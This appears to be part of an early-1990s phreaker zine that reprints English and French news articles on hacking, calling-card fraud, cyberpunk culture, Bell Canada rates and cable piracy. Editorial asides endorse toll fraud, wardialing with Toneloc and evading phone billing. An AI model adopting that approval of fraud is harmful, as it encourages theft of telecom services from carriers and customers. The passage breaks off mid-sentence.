"Thanx for the codez," he typed, adding:"You only one getting any."

If future transactions proved rewarding, he said, he would try
to lure the supplier to a face-to-face meeting where he could be
arrested by local authorities on other charges, safe-guarding the
confidentiality of the undercover exchange.

A Hacker's Attitude
~~~~~~~~~~~~~~~~~~~
He rummaged through other boards, finding files on how to turn
household chemicals into deadly poisons, how to build an "Assassin
Box" to send a supposedly lethal power surge through a telephone
line, and how to use a tone dialer to make free calls from certain
coins telephones.

Then it was time to log onto his own bulletin board - protected
by his own high-security measures - to check the mail from fellow
members of the Hi-Tech Crime Network.

Tim left a message saying he had found that a bulletin board he
was investigating concealed an even more interesting underground
board. "I'm in the process of getting elite access now," he wrote.
"Hope it works."

But, Tim wanted to know, what if he was asked to provide card
numbers in return?

"Always put them on the defensive," counseled Phrackr Trakr.
"Let them know you're interested but come across as being cautious.
They will understand that. Upload some of the files you got from
this board and that should give you some credibility. Have an
attitude. Most hackers/phreakers do."

- 30 -

Damn. It seems that this guy has an orgasm everytime he logs on an
underground board.

.Subhuman.



Leeched from LE JOURNAL BELL vol. 29 #4 - 1er f‚vrier 93

Fraudes interurbaines
FACTURES SALEES AU SAGUENAY-LAC-ST-JEAN

En janvier dernier, des clients de la r‚gion Chicoutimi-
JonquiŠre ont eu toute une surprise en recevant leur relev‚ de
compte mensuel. Pour certains la facture s'‚levait … plus de 5 000
$ en frais d'interurbain: des appels … destination de tous les
coins du monde qu'ils n'avaient vraisemblablement jamais effectu‚s.
"Ces gens ont ‚t‚ victimes d'un fraudeur particuliŠrement fut‚
qui s‚vit depuis environ six mois et dont on vient de retrouver la
trace", rapporte Jacques Desjardins, chef divisionnaire adjoint -
s–ret‚.
L'homme, qui opŠre … partir de New-York, appelle
syst‚matiquement tous les num‚ros de t‚l‚phone d'une r‚gion. Il se
fait passer pour un employ‚ du Bell et, sous un faux pr‚texte,
s'enquiert dans un trŠs bon fran‡ais du num‚ro d'identification
personnel (NIP) qui apparaŒt sur la carte d'appel de ses
interlocuteurs. Il revend ensuite cette information aux tats-unis
ou en Europe pour 200, 300 $ et plus. Il serait, … lui seul,
responsable pour environ 500 000 $ d'appels interurbains
frauduleux!
"J'insiste sur le fait que JAMAIS un employ‚ de Bell, autre
que le t‚l‚phoniste dans le cadre de son travail, ne demande le NIP
… un client", pr‚vient Melody S‚guin, chef divisionnaire-adjoint -
s–ret‚. "Le NIP est un num‚ro confidentiel; les gens ne doivent le
divulguer sous aucun pr‚texte", rench‚rit Jacques Desjardins.
La fraude interurbaine est un fl‚au contre lequel il est
difficile de se pr‚munir. Les membres de la S–ret‚ de Bell tiennent
… rappeler que tous les intervenants, qu'ils soient des
utilisateurs ou des compagnies de t‚l‚phone, doivent faire preuve
de vigilance.

-------
Quelques astuces pour d‚jouer les fraudeurs

 Ne divulguez jamais votre NIP … personne d'autre que le
t‚l‚phoniste de l'interurbain dans le cadre d'un appel.

 Soyez discrets. Ne criez pas votre NIP dans le t‚l‚phone et
cachez le clavier lorsque vous le composez.

 Dans la mesure du possible, utilisez les t‚l‚phones publics
Mill‚nium. Ces appareils sont pourvus d'un lecteur magn‚tique …
l'int‚rieur duquel vous glissez votre carte d'appel. Ainsi,
personne ne peut voir ou entendre votre NIP.

 Surveillez vos relev‚s de compte. ParticuliŠrement dans les
grandes entreprises. Les compagnies de t‚l‚phone am‚ricaines ne
confirment pas n‚cessairement les appels factur‚s … un troisiŠme
num‚ro. Certains fraudeurs facturent leurs appels interurbains au
num‚ro d'une grande entreprise en tablant sur le fait qu'ils se
trouveront noy‚s dans le flot des appels quotidiens.


- 30 -

[Blitz- C'est insultant! Mˆmes les twits du Bell croient qu'il n'y
a que des Newyorkais qui peuvent frauder! Un pirate du Saguenay
aurait trŠs bien pu faire la mˆme chose, en passant par un PBX
situ‚ … New-York, avant d'appeler avec son num‚ro de carte d'appel
vol‚. C'est probablement se qui s'est produit d'ailleurs, sauf que
les zoufs de la CHURETE du BELLE croient tenir leur fraudeur... fat
chance...]





Leeched from GB-Justice - 23/02/1993


Londres, 23 f‚v. (AFP) - Un jeune passionn‚ d'informatique qui a
sem‚ le chaos pendant au moins deux ans dans des systŠmes
informatiques de la CEE, comparaŒt devant la justice … Londres,
accus‚ notamment d'accŠs non-autoris‚ … du mat‚riel informatique et

de complot pour obtenir malhonnˆtement des services de
t‚l‚communications.

Paul Bedworth, 19 ans, a ‚t‚ arrˆt‚ il y a deux ans lorsqu'une
de ses cibles, l'Universit‚ de Leeds, exc‚d‚e par ses piratages,
est remont‚e jusqu'… lui. Le jeune homme avait acquis une telle
maŒtrise dans sa partie qu'il ‚tait capable de changer les mots de
code des systŠmes qu'il piratait, empˆchant ainsi leurs
utilisateurs autoris‚s d'y avoir accŠs.

L'Universit‚ de Leeds est ainsi rest‚e priv‚e de ses
ordinateurs jusqu'… six heures dans une mˆme journ‚e, en 1991, du
fait des activit‚s du jeune homme, qui op‚rait … partir d'une
simple console … 200 livres (300 dollars) re‡ue en cadeau … 14 ans.

Pendant ces sessions, selon l'accusation, Paul Bedworth se
connectait … des systŠmes au Luxembourg, notamment ceux de la CEE,
en Allemagne, en France, n'‚pargnant ni l'ordinateur du quotidien
Financial Times, ni des associations m‚dicales europ‚ennes, ni la
Lloyds Bank - sans toutefois en profiter pour effectuer des
op‚rations bancaires frauduleuses.

Le jeune homme, qui nie les charges retenues contre lui, a
‚galement ‚t‚ accus‚ d'avoir pirat‚ des lignes t‚l‚phoniques, pour
assouvir … moindre frais sa passion informatique. "Priv‚ de
t‚l‚phone" par sa mŠre, il avait tir‚ une ligne, qui passait sous
le tapis de sa chambre, et s'‚tait connect‚ au terminal des
T‚l‚communications britanniques de telle fa‡on que d'autres
abonn‚s, en particulier l'Universit‚ de Manchester, payaient le
gros de ses factures, sa mŠre n'‚tant redevable que d'une
communication au tarif local.

Paul Bedworth, qui avait entre 15 et 17 ans … l'‚poque des
faits, ‚tudie actuellement l'intelligence artificielle de
l'Universit‚ d'Edimbourg.


[Transcriber: Subhuman]



Leeched from
OMNI VOL.15 NO.2
NOVEMBER 1992


SECRETS OF THE CYBERCULTURE


COMPUTER COWBOYS ROAM THE TECHNO-UNDERGROUND
SEEKING INFORMATION - OR JUST WREAKING HAVOC

ARTICLE BY A. J. S. RAYL




® Something's happening here. What it is ain't exactly clear. There's
apunk with a computer over there, tellin'me I got to beware....¯

It's a time-warp scene in some weird science-fiction story as I head
down Telegraph Avenue just outside the Berkeley campus. The smell of
patchouli wafts through the air, overwhelming other scents of burnings
incense. The driving beat of the Doors' "Break on Through" pusates from
a record store - a fitting soundtrack to the movie surrounding me.
Sidewalk merchants are hawking everything from tie-dyed T-shirts to
turquoise jewelry. Me? I'm on a mission -to meet my connectionin the
counterculture. It seems conspucuously like the Sixties. But familiar
sights, sounds, and vibes aside, things have changed. After all, this is
the Nineties. Abbie Hoffman is dead. And no one is attempting to levitate
the Pentagon anymore.
But if you thought the revolution was over, think again - and read
on. These days, a new breed of younf politicized radicals, known as
cyberpunks, roam a techno-underground. Inspired and fueled in part by
ideas emerging from science-fiction literature, these cyberpunks are
computer cowboys riding the trails of cyberspace - a nether world of
bitstreams and databases inside computer networks - circumventing
software barriers in search of information and services or sometimes just
to wreak a little mischievous havoc. They've got the equipment and, they
say, the technical knowhow to slip into virtually any computer system and
affect changes with global ramifications. With the tap of a key, they
claim, they could effectively cripple the economy or shut down
communications systems the world over. If that is true, then cyberpunks
hold the potential for becoming the most powerful coundtercultural force
ever.
The government has taken them seriously. It has launched at least
two major operations, one in 1990 called Operation Sundevil, to quash the
movement. The problem: The consensus in the computer community is these
government agents know considerably less about the technology than the
computer experts and the cyberpunks, a charge government officials deny.
As Secret Service Special Agent John F. Lewis put it, "There are some
very talented infividuals who are unfortunately misdirecting their
energies. But to say they're leaps and bounds ahead of law enforcement
personnel isn't true." Still, so far their efforts, have seemed dubious
at best, serving more to fan the flames of the socio-political fire now
raging over the control of and individual rights in the electronic
frontier. I duck into a coffeehouse and manage, with relative ease, to
spot my connection - one of the hackers for whom the word cyberpunk was
created. he's tall and slender, wearing black jeans and sporting a pair
of John Lennon specs. He has a boyish, almost baby, face, which belies
the brain power it so handsomely covers. His eyes are intese, at times
piercing. Overall, he appears every bit the intellectual anarchist for
which the Berkeley scene is perfect camouflage. He's known in the techno-
underground as Michael Synergy.
Twelve years ago, Synergy was your basic computer nerd. He spent his
time exploring cyberspace, staging his own quiet protests by going where
he wanted, when he wanted. Synergy became so adept at infiltrating
systems that he's become a legend. Todat he remains something of an icon
in the techno-underground.
Synergy evolved - as did cyberpunk - from the late Seventies'hacker
community. "There ware a lot of us playing with the phone systems, and
then slowly we began to find our ways into other networks," says Synergy,
as he takes a sip of tea, adjusts his Lennon specs, and leans back in his
chair. "My whole reason for breaking into systems way back then was to
become educated. At that time, there wasn't a C-compiler on
microcomputers, so I broke into Bell Labs just to learn C." Most hackers
used their talents then, Synergy says, simply to learn. For the most
part, the original hacker crew was apolitical - more interedted in the
machines than in the politics.
As they began traversing software barriers into the secured systems
of major corporations, governement, and military-industrial complexex,
however, that began to change. They gleaned a lot of inside, top-secret
information on just about everything, including covert military
operations. At the age of 14, Synergy, now in his late twenties, managed
to slip into a supposedly secure top-secret computer network run by the
intelligence community and the Department of Defense. The DOD took him
out of cyber circulation and brought him into their circle. He worked for
nearly three years conducting "penetration testing and security design"
for the national Security Agency, Secret Service, and FBI, as well as the
DOD.
Consequently, Synergy became politicized. "it used to be really hard
to find things out, but nowadays systems are so well networked together,
if you know which machine to talk to in the intelligence community, it's
fairly simple to break in," he says. "The work I did for different
government agencies gave me an inside view, and that strengthened my
opinions. It made me very political and very antigovernment. Once you
have access to the system, you begin to clearly see the bars of the
prison we live in."
While Synergy was being politicized, writers on the science-fiction
front were at work writing about such youthful electronic frontier
outlaws. They projected them into dark, desolate, not-so-distant futres
where technology both rules and runs amok, and set them in adventures in
cyberspace where data serves as the landscape and territories are
traversed mathematically, not geographically or physically.
The term cyberpunk was brainstormed back in 1980 by Bruce Bethkeas
the title for a short story he'd written about a computer-hacker gang -
bored suburban kids out to raise hell. Bethke had been hanging around,
playing keyboards on the periphery of the punk New Wave music scene while
working for Radio Shack. "I wanted a word that grokked these punk
attitudes and the technologies," he says. The story, which was published
in the magazine Amazing in 1983, remained obscure - but the title took
seed, first in the science-fiction community and then in the media at
large.
The success of William Gibson's first novel, Neuromancer, published
in 1984, actually launched the cyberpunk on the map of the collective
public consciousness. Set in a future urban dystopia, the novel centers
on Case, a software cowboy for hire. Burned by Japanese microbionics
experts who bonded tiny sacs of a wartime Russian mycotoxin to his artery
walls, Case is suffering a slow death. He finds a man who can cure him,
provided, of course, that he is able to penetrate a highly secured
computer system and acquire the key information. In order to get inside
the various systems, Case links his brain directly to the computer, or,
in the terminology of the novel, "jacks in to the net."
While the word cyberpunk never appears in the Neuromancer text, it
was the catch phrase that reviewers used to define his book ans the new
genre that suddenly seemed to be everywhere. Other cyberpunk-oriented
works by such writers as Bruce Sterling (Schismatrix, Islands in the
Net), Pat cadigan (Mindplayers, Pretty Boy Crossover), and John Shirley
(Eclipse coroca) captured SF fans.
Gibson, whose own early inflences were such "subversive" rock-'n'-
rollers as Lou Reed/Velvet Underground and Steely Dan, had been watching
the puck-music scene with a certain enthusiasm. In fact, he says, the
rebelliousness of puck served as the inspiration, and his own boredom as
the fuel that motivated him to begin work on Neuromancer and numerous
other cyberpunk short storied (many first published in Omni). Gibson
wrote two more cyberpunk-oriented novels - 'Count Zero' and 'Mona Lisa
Overdrive' - and garnered acclaim as the godfather of cyberpunk. It's not
a title, however, that he's assumed.
"It's really just an accident in history," says the author, whose
roots go back to the counterculture of the Sixties. Gibson actually knew
very little about computers and high technology: He pounded out his
cyberpunk works on a 1938 manual typewriter while listening to early
Bruce Springsteen albums. "I didn't set out to start a movement, but for
whatever reason, "he says, "those books of mine have become a rallying
point."
Co-cyber writer Sterling agrees that Gison was in the right place at
the right time. "to some extent, people always credit the messengers,"
says Sterling, whose first nonfiction work, Hacker Crackdown, about the
government's efforts to stop hackers, was published this fall. "We write
books for a purpose - not just to be cute. Science fiction is about
making up weird ideas and throwing them out there. And now all that stuff
we were writing about 'is' out there - loose in the world."
What happened when cyberpunk science fiction hit was a case of life
imitating art. "Suddenly, the concept of cyberspace took hold and
inspired the real hackers, and they began to redirect their efforts in
the technical arena. It gave us a vision of technology's potential," says
Synergy. "most ocmputer enthusiasts and a lot of the hackers are very
thechnical, but not very intouch with the world at large. The difference
is cyberpunks are very technologically capable but at the same time very
worldly, connected to reality and what's going on in the culture."
In ssence, the cyberpunks are to the hackers as yippied were to
hippied - political, savvy, worldly versions of the alternative culture.
They don't hack out in places, but in cyberspaces, communing, often
anonymously, on computer bulletin-board systems or through "zines" -
electronic magazines. While there are several hardcopy magazines devoted
to things cyberpunk - the most popular being 'Mondo 2000' - cyberpunks do
their real business in the net.
"Listen to these titles - Anarchy 'N' Explosives, Bootlegger, Clut
of the Dead Cow Files, Freaker's Bureau International' National Security
Anarchists, Phuck-in Phield Phreakers, Rebel's Riting Guild, and TAP
(Technological Advancement Party) Online, which is actually the
resurrection of Abbie Hoffman's old magazine," says Sterling, leafind
through a compilation of computer sources recently sent to him.
The vast majority of bulletin-board systems and zines, however, are
legal and aboveboard. In 1985, 'the Whole Earth Review' created the
'Whole Earth Lectronic Link, known as the WELL. "While this electronic
medium existed, there was no publicly available community," says founder
Howard Rheingold. "The purpose was to create a public utility to enable
people to build a community and do business online." Current WELL members
include communications pioneers as well as SF authors like Sterling, and,
of course, cyberpunks. Such above-ground efforts signify that cyberpunk
is merging in pop culture, assuming meaning as a lifestyle, a way of
thinking and, hence, a movement whose numbers - at least in terms of
subscribers to the mindset - are beginning to grow.
Central to the cyberpunk viewpoint is the belief that governments -
nation states - are giving way to multinational corporations - global
states. These entities are located not so much in one geographical
location but throughout the world via global networks on the electronic
frontier.
In this electronic landscape, cyberpunks see a future where those
who have information will be separated from thoose who don't. By
disseminating information - be it corporate plans or top-secret
government operations - they believe they can take on self-as-sumed roles
that range from benign socioopolitical watchdogs capable of averting
global opression to anarchists retaliating against corporate greed by
wreaking havoc on computer systems - or as electronic terrorists ready,
willing, and able to take out an enemy simply by shutting down systems.
It comes as no surprise then that the governement is up in arms. In
Secret Service and FBI circles - the government agencies charged with
computer law enforcement - the term cyberpunk has almost come to mean
computer criminal. And cases like the 1988 Internet "worm" have
undoubtedly fed the crackdown fever. Created by 25-year-old Robert
Morris, the worm shut down some 6,500 computers and caused an esimated
$150,000 to $200 million worth of damages to computer systems nationwide.
Because his defense attorneys were able to prove the destruction was
unintentional, Morris was sentenced to a $10,000 fine and 400 community-
service hours.
Since then, there have been several instances of what the hackers
clam are government attempts to suppress the cyberpunk media. Steve
Jackson Games is a case inpoint. Secret Service agents raided this small
Austin-based games manufacturer - publishers of fantasy-role-playing and
board games - in March 1990. They seized computers and a stack of
software disks and ransacked the company's warejouse. Some materieals
seized in the raid, including the game GURPS Cyberpunk, have yet to be
released, and Jackson has filed a civil suit against the government as a
result.
Spurred by this incident, the computer community rallied, holding a
meeting on the WELL in late spring 1990. Mitch Kapor, creator of Lotus 1-
2-3; Apple cofounder Steve Wozniak; Sun Microsystems pioneer John
Gilmore; and computer enthusiast and Grateful Dead soongwriter John Perry
Barlow formed the Electronic Frontier Foundation to protect freedom of
speech and expression in cyberspace.
With the recent arrests of numerous hackers for illegal entry and
data possession, the battles over control of the electronic frontier and
hackers'rights are now being waged in court. One critical issue is
whether information belongs to a given corporation or government or
whether it belongs to the world. for those who are relaying information
through computer networks and zines, here is also the question of First
Amendment rights' or Hackers'Richts. How free is a free press in the
electronic medium? This debate over intellectual freedom isn't entirely
benign. The access to knowledge, like freedom, is risky when absolute.
Things have changed in the hacker community. the first generation of
young computer enthusiasts, now in their twenties, operated from a more
mature, concerned-for-the-future frameof reference. But synergy admits
danger may lie ahead with the new generation of hackers: "The new kids on
the block, the new 14-year-old cast and crew, don't have a very good
handle on morality, knowing what they should and souldn't be doing with
these wonderful tools they

  
have."
Furthermore, computer technology has outmoded old forms of political
power. "Anyone who was around in the Sixties is aware of the concept that
all political power comes from the barrel of a gun and the power to
control is the power to destroy," Synergy says. "Now, with information
tools, people like me have the capability and the access - because of the
way system is structured - to shut everything down - not just locally,
but globally. And, it's getting worse every day.
Interestingly, Synergy's vision of the future liew on the opposite
end of the cyberpunk spectrum from Gibson's. "I think Gibson is about the
most pessimistic mother fucker I've ever run into," says Synergy. "His
basic premise is that science will be abused, period. I tend to be more
of an optimist: If we were going to blow each other up, we'd have done it
by now. And, actually having been inside and looked around, I seriously
doubt whether we actually could blow ourselves up."
"Well, if you're living in south Central Los Angeles," says Gibson,
"the world is a lot uglier than the world in Neuromancer. And, in some
cases, you'd be very lucky to wind up with the Neuromancer future. It's
hardly the most dystopian vision."
The cyberpunk future is still up for grabs - between utopia and
dystopia. But indications are that the world will be one of corporate
states, moving away from governments of locales to goveernments of
multinational corporations whose increasing monopolization of information
wields more and more power and control over individuals as well as nation
states. The new tools for diplomacy, politics, espionage, and terrotism
will be electronic ones.
While cyberpunk seems to have the potential for being the most
potent, effective, bohemian force ever to take on civilization, its
impact remains to be seen. One thing, however, is certain: CYBERPUNK
ISN'T JUST SCIENCE FICTION ANYMORE.





Leeched from LE JOURNAL BELL - 18 janvier 93


LA MESSAGERIE VOCALE FLIRTE AVEC LA TLCOPIE

D‚but de janvier, FaxCall, un nouvel outil des SystŠmes de
messagerie vocale int‚gr‚s, qui permet d'exp‚dier de la documentation par
t‚l‚copie, faisait son entr‚e chez Bell. Ce service, disponible pour la
clientŠle externe depuis septembre dernier, est offert … l'interne par
InfoCENTRE.
Son fonctionnement est simple. Quand on appelle une messagerie
vocale ‚quip‚e de FaxCall, un message indique que de la documentation
‚crite est disponible sur le t‚l‚copieur. Pour l'obtenir, il n'y a qu'…
suivre les consignes que dicte le message.
D'ici la fin du premier trimestre, les employ‚s de Bell seront en
mesure d'obtenir de la documentation t‚l‚copi‚e sur une foule de sujets
qui vont des avantages sociaux aux relations de travail en passant par
toute la gamme des produits et services des T‚l‚boutiques. Et l'‚quipe
d'InfoCENTRE sera heureuse de cr‚er de nouvelles applications pour les
groupes qui en feront la demande. On peut contacter InfoCENTRE en
composant le (514) 870-4141.
Vous avez envie d'essayer FaxCall? Faites le 870-9156. On vous
exp‚diera imm‚diatement une t‚l‚copie de cet article de mˆme que de la
documentation suppl‚mentaire!

- 30 -

Leeched from LE JOURNAL DE QUBEC - Lundi 8 f‚vrier 93


LA BELL AFFAIRE!

par
Jean-Philippe Decarie

Pour un grand coup, c'en fut tout un. En annon‡ant, vendredi, qu'elle
comptait d‚poser une requˆte auprŠs du CRTC afin de l'autoriser … hausser
de 50% son tarif de base, Bell Canada a fait mentir l'expression
populaire anglaise "Il n'y a pas de quoi ‚crire … sa mŠre". Avec une
telle hausse appr‚hend‚e, on est tous mieux d'appeler nos mŠres avant
septembre, parce que, aprŠs cette date, il sera plus ‚conomique de
correspondre par la poste!
videmment, j'exagŠre. Mais dans le contexte actuel d'une inflation
enray‚e, d'une croissance timide et d'une reprise incertaine, la requˆte
de bell Canada est audacieuse, pour ne pas dire irr‚aliste.
Il fallait s'attendre que notre compagnie de t‚l‚phone, qui a
toujours v‚cu sous la coupe dor‚e d'un monopole, ajuste sa grille
tarifaire … son nouvel environnement concurrentiel.
Mais tous s'attendaient … ce que Bell ait au moins … subir les
contrecoups de la d‚r‚glementation dans l'interurbain avant de frapper
sur le service de base qu'elle finance … perte depuis des ann‚es.
A titre d'entreprise de service public qui n'a jamais eu … souffrir
de concurrence -par opposition … Gaz M‚tro, par exemple, qui doit
affronter quotidiennement la machine d'tat qu'est Hydro-Qu‚bec- Bell a
toujours b‚n‚fici‚ d'un taux de rendement all‚chant. Entre 12.5% et 13.5%
annuellement, et ce, sans avoir de concurrents dans les pattes.
C'est en vertu de ce taux de rendement que Bell a enregistr‚ des
profits de 1 milliard, en 1992, et a permis … son holding, BCE, de
d‚gager un b‚n‚fice net de 1,4 milliard, pour l'ann‚e.
Combien d'entreprises ont pu r‚aliser un tel taux de rendement au
cours des trois derniŠres ann‚es alors que plusieurs d'entre elles ont
plut“t assist‚ … l'effondrement de leur march‚?
Beaucoup de ces entreprises se seraient content‚es de r‚aliser le
rendement de 7% qu'offrent les certificats de placement des banques pour
des termes de cinq ans!

La r‚alit‚

Le pire dans tout cela, c'est que Bell Canada est justifi‚e, ou sera
justifi‚e, d'augmenter le co–t de son service de base.
Depuis quatre ans, d‚j…, que Bell nous pr‚vient que le jour o— le
march‚ de l'interurbain ne sera plus sa cagnotte exclusive, elle devra
facturer les clients de son service de base en cons‚quence.
On le sait, pour que nous ayons droit … une facture mensuelle d'une
dizaine de dollars, il en co–te 40 $ par mois … Bell pour fournir cette
seule ligne t‚l‚phonique.
De tout temps, Bell a appliqu‚ une politique d'interfinancement en
utilisant les g‚n‚reux profits de l'interurbain pour soutenir le service
de base.
L'arriv‚e massive des entreprises qui achŠtent des circuits
t‚l‚phoniques pour les louer … rabais … certains clients et, surtout,
l'entr‚e en scŠne d'Unitel, appuy‚e par AT&T, qui va concurrencer Bell
directement auprŠs des simples usagers pour les interurbains, ne
permettra plus … notre compagnie de t‚l‚phone de financer son service de
base.
Ce sera donc … nous de payer la juste part du co–t d'utilisation de
notre t‚l‚phone.
Sauf que bell nous demande de payer dŠs avril une premiŠre
augmentation et une seconde, en septembre, afin de se pr‚munir contre la
baisse du taux de rendement de son action … la Bourse.
L'immense majorit‚ des sept millions de clients de Bell Canada n'est
pas actionnaire de la compagnie et ne se serait pas sentie menac‚e
d'absorber la hausse de tarifs sur une ou deux ann‚es, mˆme si le taux de
rendement en souffre un peu.
La menace que nous brandit Bell Canada de voir ses possibilit‚s de
financement r‚duites sur les march‚s financiers, si son taux de rendement
est affect‚, ne justifie pas une augmentation du tarif de base aussi
abrupte dans le temps.

- 30 -

[Blitz- Le mec est timor‚, tout de mˆme. Travaillerait-il pour Bell, pour
ˆtre aussi doux? Le jour vient, mes frŠres (et il vient vite) o— il va
falloir payer pour chaque appel qu'on fait. Votre tarif de base va
comprendre quelque chose comme 150 appels par mois, et chaque appel
suppl‚mentaire va vous co–ter dix sous. Imaginez l'horreur pour les babs,
ou pour ceux qui scannent 50 ou 60 mille num‚ros par mois avec Toneloc!
Bell ouvre donc la porte … d'autres formes d'abus de la part de ses
utilisateurs, car il est bien certain que nous allons, tous ensemble,
trouver le moyen de contrer cette facturation ‚hont‚e...]


Leeched from LA PRESSE - Lundi 15 f‚vrier 1993

INTERURBAIN: LA CONCURRENCE MOINS RENTABLE
QUE PRVU POUR LE CONSOMMATEUR


Presse Canadienne - La concurrence dans l'interurbain pourrait ne pas
offrir aux Canadiens les grandes ‚conomies annonc‚es, croit une experte
am‚ricaine.
"Le march‚ de l'interurbain a ‚t‚ ouvert … la concurrence aux
tats-unis il y a neuf ans, nous connaissons donc ce qui pourrait advenir
au Canada", raconte Minnie Rajwar, du Telecommunications Research and
Action Center, de Washington.
Cet organisme … but non lucratif examine les activit‚s et tarifs des
trois grandes compagnies d'interurbain et des centaines de compagnies
r‚gionales apparues durant la d‚cennie, dans ce riche march‚.
Les compagnies promettent de fortes ‚conomies … la clientŠle mais,
explique en entrevue Mme Rajwar, les vraies r‚ductions sur la facture
sont souvent moindres que ce qui avait ‚t‚ miroit‚.
"D'habitude, les compagnies parlent de r‚ductions de 20 … 30 p.
cent. Mais selon nos chiffres, l'‚conomie v‚ritable n'est que de 8 p.
cent environ."
Suivant le problŠme au USA - et possiblement au Canada - les
factures viennent toujours des compagnies locales ou r‚gionales.
Certaines de ces grandes compagnies de services ont ajout‚ au service
local des frais suppl‚mentaires, qui en fait annulent les ‚conomies sur
l'interurbain.
En juin 1992, le CRTC a autoris‚ la concurrence dans l'interurbain
au Canada. Mais des recours devant les tribunaux en ont retard‚ jusqu'en
janvier l'avŠnement, entre cinq compagnies nationales et r‚gionales.
La plus grande, Bell canada, a d‚j… demand‚ au CRTC de hausser ses
tarifs locaux de 65 p. cent, en commen‡ant le 1er avril. Si cela est
autoris‚ au complet, la base du tarif mensuel local, … Toronto, Ottawa et
Montr‚al, grimperait de 12.60 $ … 19 $.
Bell Canada r‚torque qu'elle n'a pas accru son tarif local de puis
10 ans et qu'il lui faut cette augmentation, pour compenser la perte de
son monopole de l'interurbain qui rapportait de gros profits.
"L'ampleur des hausses demand‚es est scandaleuse", lance George
Horhota, de la Canadian Business Telecommunications Alliance.
"Ne vous scandalisez pas, dit Mme Rajwar, c'est la r‚alit‚ que
subissent d‚j… les Am‚ricains. Nous disons d'abord au gens de ne pas
croire ces annonces … la t‚l‚vision, qui promettent des ‚conomies
d'interurbain. Surveillez bien le montant, au bas de votre facture.
Selon M. Eamon Hoey, consultant en communications, le seul moyen
pour les Canadiens d'‚viter cette situation est de protester avec ‚nergie
auprŠs du gouvernement f‚d‚ral.
"L'‚poque de Maman Bell est r‚volue. Les Canadiens doivent forcer
Ottawa … empˆcher que la stabilit‚ des tarifs locaux soit sacrifi‚e … la
concurrence dans l'interurbain", affirme M. Hoey.
Une vraie concurrence dans l'interurbain pourrait faire ‚conomiser
aux abonn‚s r‚sidentiels et commerciaux jusqu'… 2 milliards par ann‚e,
dit-il.

- 30 -


Leeched from LA PRESSE - Lundi 21 f‚vrier 1993


DES ABONNS DE BELL DISENT LEUR INDIGNATION AU CRTC
Un monopole puissant, trŠs riche et qui n'a d'‚gard
pour personne

Presse Canadienne- La demande de Bell Canada pour ˆtre autoris‚e …
augmenter de 60 p. cent cette ann‚e les tarifs locaux de ses clients en
Ontario et au Qu‚bec a soulev‚ la fureur de certains abonn‚s.
Ils ont fait part de leur indignation dans des lettres adress‚es au
Conseil de la radiodiffusion et des t‚l‚communications canadiennes
(CRTC), qui a invit‚ les abonn‚s … faire connaŒtre leurs point de vue sur
l'augmentation des tarifs demand‚ par Bell, ainsi que sur son plan visant
… ‚largir les zones d'appel local … Ottawa, Toronto et Montr‚al.
Des 159 lettres re‡ues jusqu'… maintenant, quelques-unes demandaient
des pr‚cisions, tandis que 23 appuyaient une certaine hausse des tarifs
ou l'‚largissement des zones d'appel local.
Un abonn‚ ƒg‚ a ‚crit: "Je suis pris en otage dans ma propre
province. Vous ˆtes oblig‚ de payer, sinon on vous coupe le t‚l‚phone."
Un groupe de locataires a ‚crit: "Nous esp‚rons que le CRTC
rejettera cette tentative outrageante de Bell Canada de donner la
pr‚f‚rence … ses actionnaires plut“t qu'… ses abonn‚s ƒg‚s et aux autres
qui ont fait de Bell Canada ce qu'elle est aujourd'hui: Un monopole
puissant, trŠs riche et qui n'a d'‚gard pour personne."
Parmi les questions soulev‚es par ceux et celles qui s'opposaient …
l'augmentation des tarifs, il y avait notamment:
-Les avantages de l'‚largissement des districts d'appel local
s'appliquent … une minorit‚, mais seraient pay‚s par la majorit‚.
-Bell cherche … ‚liminer la concurrence sur les interurbains en
‚largissant ses zones d'appel local.
-Bell r‚alise des profits plus que raisonnables.
-Si Bell a besoin de plus d'argent, elle devrait r‚duire ses
d‚penses inutiles comme les autres entreprises ont d– le faire durant la
r‚cession.
-Bell utilise la concurrence dans le march‚ interurbain comme une
excuse pour hausser les tarifs locaux, mais la concurrence est toujours
inexistante dans de nombreuses r‚gions desservies par Bell.

D'autres ont ‚crit pour dire qu'ils avaient perdu leurs emplois ou
‚taient des personnes ƒg‚es ayant un revenu fixe et ne pouvaient pas
payer les hausses de tarif.

Bell pr‚cise que les augmentations rapporteront … la compagnie 210
millions de plus en 1993 et 450 millions en 1994.



Leeched from LE SOLEIL - Vendredi 5 f‚vrier


Tel est pris qui se croyait cƒbl‚...

HARTFORD (Reuter) - Bien mal cƒbl‚ ne profite jamais.
C'est ce qu'on d‚couvert … leurs d‚pens 140
t‚l‚spectateurs am‚ricains trop malins, qui utilisaient
des d‚codeurs pirates pour s'offrir gratuitement les
programmes d'une chaŒne cƒbl‚e. Ils n'ont pu r‚sister au
tee-shirt gratuit que leur offrait la chaŒne Continental
Cablevision pendant la retransmission d'un match de boxe.
Un simple coup de fil au num‚ro de t‚l‚phone affich‚ …
l'‚cran suffisait pour obtenir le superbe cadeau. Ce
qu'ignoraient les fraudeurs, c'est que le message ne
pouvait ˆtre aper‡u que par les d‚tenteurs d'un d‚codeur
pirate, qui ont t‚l‚phon‚ en toute candeur … la chaŒne.
"Ca a march‚ comme un charme. Les gens qui ont appel‚
nous ont donn‚ leurs noms et adresses pour que nous
puissions leur envoyer le tee-shirt", a expliqu‚ un
responsable de la Continental. Ils ont re‡u … la place
une amende de 2000 $ US.


(Dumb fucks! - Blitzkreig)


------------------

Leeched from LE NOUVEL OBSERVATEUR No 1473
du 28 janvier au 3 f‚vrier

(contribution de Satan's Ghost - Paris - ces deux
entrefilets entouraient un long article assez soporifique
sur les jeux vid‚o, que nous ne reproduiront pas ici...
Le premier entrefilet concerne des cas de kids
britanniques qui faisaient des crises d'‚pilepsie devant
leur SNES...)


EPILEPSIE: SUPER MARIO INNOCENT

par G‚rard Petitjean

M. Nintendo et M. Sega ont eu chaud. Quand la rumeur a
commenc‚ de courir dans les colonnes de la presse
britannique, les fˆtes de No‰l ‚taient pass‚es. Les
ventes de consoles ‚taient faites. Tous ces gamins qui
avaient eu le bon go–t d'attendre la fin du r‚veillon
pour faire une crise d'‚pilepsie aprŠs avoir titill‚ leur
console pendant des heures ont rendu un fier service … la
Bourse de Tokyo. Le titre Nintendo n'a perdu que 100
yens. Pour l'instant, une dizaine d'enfants ont ‚t‚
atteints sur la planŠte. C'est peu: on d‚nombre 150
millions de fans de "Sonic" ou de "Super Mario" … travers
le monde. Et pas trop inqui‚tant. car, nous apprennent
les neurologues, la console ne fabrique pas des
